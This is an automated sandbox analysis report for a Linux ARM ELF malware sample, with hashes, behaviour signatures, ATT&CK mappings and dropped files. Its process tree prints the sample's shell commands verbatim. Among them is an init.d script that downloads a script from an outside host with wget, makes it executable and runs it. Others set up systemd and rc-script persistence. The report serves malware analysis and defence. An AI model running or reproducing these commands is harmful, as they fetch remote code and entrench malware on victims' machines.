Overview

overview

9

Static

static

1

d5fa8d05f1...70.elf

debian-9-armhf

9

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    19-09-2024 06:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf

  • Size

    648KB

  • MD5

    343770e1d6d9a1f782823d8305405da0

  • SHA1

    f07f9fcad82694f36dac9e51e86b1331b69a5d19

  • SHA256

    d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70

  • SHA512

    1fc4e698c3beba8fd9345f1e6e3830824e5cb5a2fa352a9253eb017de546d01398e32b8e4cb10df13b9f7fc2cab9cde418c4233e5cbb4ca99f90dff6e03ec147

  • SSDEEP

    12288:UB9mQoSyE0zYggEKavjwmitmCd89KiCMSggplw7wW0dFEGvW1VPH1h:UboB1zYggEKaLF28QdMx90dFEGvWTPH1

Score
9/10
defense_evasiondiscoverypersistenceprivilege_escalation

Malware Config

Signatures

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

    persistenceprivilege_escalationdefense_evasion
  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

    persistence
  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

    persistence
  • Modifies systemd 2 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

    persistenceprivilege_escalation
  • Modifies Bash startup script 2 TTPs 1 IoCs
    persistence
  • Changes its process name 1 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 5 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
    /tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
    1⤵
    • Modifies Watchdog functionality
    • Creates/modifies environment variables
    • Modifies init.d
    • Modifies rc script
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    PID:657
    • /bin/sh
      sh -c -- "systemctl enable custom.service >/dev/null 2>&1"
      2⤵
        PID:659
        • /bin/systemctl
          systemctl enable custom.service
          3⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:661
      • /bin/sh
        sh -c -- "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
        2⤵
        • File and Directory Permissions Modification
        PID:670
        • /bin/chmod
          chmod +x /etc/init.d/mybinary
          3⤵
          • File and Directory Permissions Modification
          PID:672
      • /bin/sh
        sh -c -- "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
        2⤵
          PID:674
          • /bin/ln
            ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
            3⤵
              PID:677
          • /bin/sh
            sh -c -- "echo \"#!/bin/sh # /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf case \\\"\$1\\\" in start) echo 'Starting d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf' /tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf & wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf' killall d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf"
            2⤵
            • File and Directory Permissions Modification
            • Modifies init.d
            PID:680
          • /bin/sh
            sh -c -- "chmod +x /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf >/dev/null 2>&1"
            2⤵
            • File and Directory Permissions Modification
            PID:683
            • /bin/chmod
              chmod +x /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
              3⤵
              • File and Directory Permissions Modification
              PID:685
          • /bin/sh
            sh -c -- "mkdir -p /etc/rc.d >/dev/null 2>&1"
            2⤵
              PID:687
              • /bin/mkdir
                mkdir -p /etc/rc.d
                3⤵
                • Reads runtime system information
                PID:688
            • /bin/sh
              sh -c -- "ln -s /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf /etc/rc.d/S99d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf >/dev/null 2>&1"
              2⤵
                PID:691
                • /bin/ln
                  ln -s /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf /etc/rc.d/S99d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
                  3⤵
                    PID:692

              Network

              MITRE ATT&CK Enterprise v15

              Reconnaissance

              Resource Development

              Initial Access

              Execution

              Persistence

              Boot or Logon Autostart Execution

              4
              T1547

              XDG Autostart Entries

              1
              T1547.013

              Boot or Logon Initialization Scripts

              2
              T1037

              RC Scripts

              2
              T1037.004

              Create or Modify System Process

              1
              T1543

              Systemd Service

              1
              T1543.002

              Event Triggered Execution

              1
              T1546

              Unix Shell Configuration Modification

              1
              T1546.004

              Hijack Execution Flow

              1
              T1574

              Path Interception by PATH Environment Variable

              1
              T1574.007

              Privilege Escalation

              Boot or Logon Autostart Execution

              4
              T1547

              XDG Autostart Entries

              1
              T1547.013

              Boot or Logon Initialization Scripts

              2
              T1037

              RC Scripts

              2
              T1037.004

              Create or Modify System Process

              1
              T1543

              Systemd Service

              1
              T1543.002

              Event Triggered Execution

              1
              T1546

              Unix Shell Configuration Modification

              1
              T1546.004

              Hijack Execution Flow

              1
              T1574

              Path Interception by PATH Environment Variable

              1
              T1574.007

              Defense Evasion

              File and Directory Permissions Modification

              1
              T1222

              Linux and Mac File and Directory Permissions Modification

              1
              T1222.002

              Hijack Execution Flow

              1
              T1574

              Path Interception by PATH Environment Variable

              1
              T1574.007

              Impair Defenses

              1
              T1562

              Credential Access

              Discovery

              Network Service Discovery

              1
              T1046

              System Information Discovery

              1
              T1082

              Lateral Movement

              Collection

              Command and Control

              Exfiltration

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /boot/bootcmd
                Filesize

                185B

                MD5

                6d8ec3d8286c9e54cda61859e7b0fb05

                SHA1

                020b4d6ab5a158cc2904bdd1815725a0f4901af7

                SHA256

                18d6efcb9a5f5f296f6302ce3d4067fd3e8904b16f46759728444eb329bdfd27

                SHA512

                9f9b61068a4d03315f0a14f1f03c97ec20b695cacd63c309211ced4b524f4631c7a680381decf6ca8f2a8779ba470bc1b1d131d48cdb105fac57451963dfef09

                Download Submit

              • /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
                Filesize

                693B

                MD5

                481e0ab2347bdbe19afdac7bc9e30c24

                SHA1

                fdc6b3f56318d4df063d522aea1aec6b1de39018

                SHA256

                a8637084d9994e7fad8d5e9c626b3354f3231d4248aff66896c401f18073c056

                SHA512

                c152ebef13025bf1273269d4c01589e399e121f8e783c2a040639759d90ad4134935b221ba376d56fd1684b207cd2d4cf10b0aafd5aacb6ae2831e16182e341b

                Download Submit

              • /etc/init.d/mybinary
                Filesize

                172B

                MD5

                4799ba3a615a9c7430e240895b4b3b03

                SHA1

                af9b5d78f0e4080c0012ed0649f4cc7b407f30d2

                SHA256

                91abe00464fc1b81daefa8c6517e51cc6edd1879c6d76363611144ad25cf7957

                SHA512

                c6221bff5ba670eeec03f8ad19b17ad8ad2396fe10bebcbed8e016a26dc25f64d2393af2e0c1ae681a70ff2af9c35b8157f2ee2d000effbd4b9f92b2c75a8c22

                Download Submit

              • /etc/inittab
                Filesize

                177B

                MD5

                fe82379e0454f7aa7a203a0081600ace

                SHA1

                ddbffcfff848b40e546edce6adc925821011f667

                SHA256

                04c89719cc36fbad2d9650abbfc14e271a39bb0fa53d01f38ead377f6b72746d

                SHA512

                20a50140a6bc4f737958193e7d7a45da1502c7c22de4660923a6f02832369f3aa0a6d09ff8687f111adae9021a5335f7694a2a4e5c29ef88e4fb5796f31f0701

                Download Submit

              • /etc/systemd/system/custom.service
                Filesize

                366B

                MD5

                045e090de33705e58c29b6bf94e928d4

                SHA1

                3518ffd7c3b1a062a3798507e7a2f2172e34776d

                SHA256

                97fc3a66d57fa4c249dd0a3108932711024cf5b4af48c0ec41994c25955f33b5

                SHA512

                a2255a55ed69ad4e327fa117c79470ee96a1c55f08eca6fb3ded4552ea4cf57264e56c386c76fa41e72fec787f7be3d9b0edd8a07ff2cb69042d604b94fb4aba

                Download Submit